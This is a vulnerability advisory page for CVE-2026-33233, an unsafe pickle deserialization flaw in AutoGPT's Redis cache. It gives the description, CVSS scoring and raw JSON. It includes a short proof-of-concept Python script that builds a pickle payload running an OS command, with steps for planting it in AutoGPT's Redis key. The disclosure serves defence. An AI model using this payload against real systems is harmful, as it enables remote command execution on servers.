Security Vulnerability Report
中文
CVE-2026-33233 CVSS 7.6 HIGH

CVE-2026-33233

Published: 2026-05-19 02:16:16
Last Modified: 2026-05-19 15:16:30

Description

AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.6.34 through 0.6.51, the backend deserializes Redis cache bytes using pickle.loads without integrity/authenticity checks. The write path serializes values with pickle.dumps(...) into Redis and the read path blindly invokes pickle.loads(...) on bytes with no HMAC/signature or strict schema validation gating deserialization. If an attacker can poison a shared-cache key in Redis, arbitrary command execution is possible in the backend container context, affecting confidentiality, integrity, and availability. This issue has been fixed in version 0.6.52.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AutoGPT 0.6.34
AutoGPT 0.6.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle import os import base64 # Generate a malicious pickle payload to execute a command # Command to execute on the target server COMMAND = "whoami" class Exploit(object): def __reduce__(self): # This tells pickle to execute os.system(COMMAND) when deserializing return (os.system, (COMMAND,)) # Serialize the exploit object malicious_payload = pickle.dumps(Exploit()) # Convert to base64 to facilitate transport or display encoded_payload = base64.b64encode(malicious_payload).decode('utf-8') print(f"Generated Malicious Payload (Base64): {encoded_payload}") print("\nUsage:") print("1. Decode the Base64 string to bytes.") print("2. Write the bytes to the target Redis cache key used by AutoGPT.") print("3. Wait for AutoGPT to deserialize the key.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33233", "sourceIdentifier": "[email protected]", "published": "2026-05-19T02:16:15.840", "lastModified": "2026-05-19T15:16:30.033", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.6.34 through 0.6.51, the backend deserializes Redis cache bytes using pickle.loads without integrity/authenticity checks. The write path serializes values with pickle.dumps(...) into Redis and the read path blindly invokes pickle.loads(...) on bytes with no HMAC/signature or strict schema validation gating deserialization. If an attacker can poison a shared-cache key in Redis, arbitrary command execution is possible in the backend container context, affecting confidentiality, integrity, and availability. This issue has been fixed in version 0.6.52."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Significant-Gravitas/AutoGPT/releases/tag/autogpt-platform-beta-v0.6.52", "source": "[email protected]"}, {"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-rfg2-37xq-w4m9", "source": "[email protected]"}, {"url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-rfg2-37xq-w4m9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}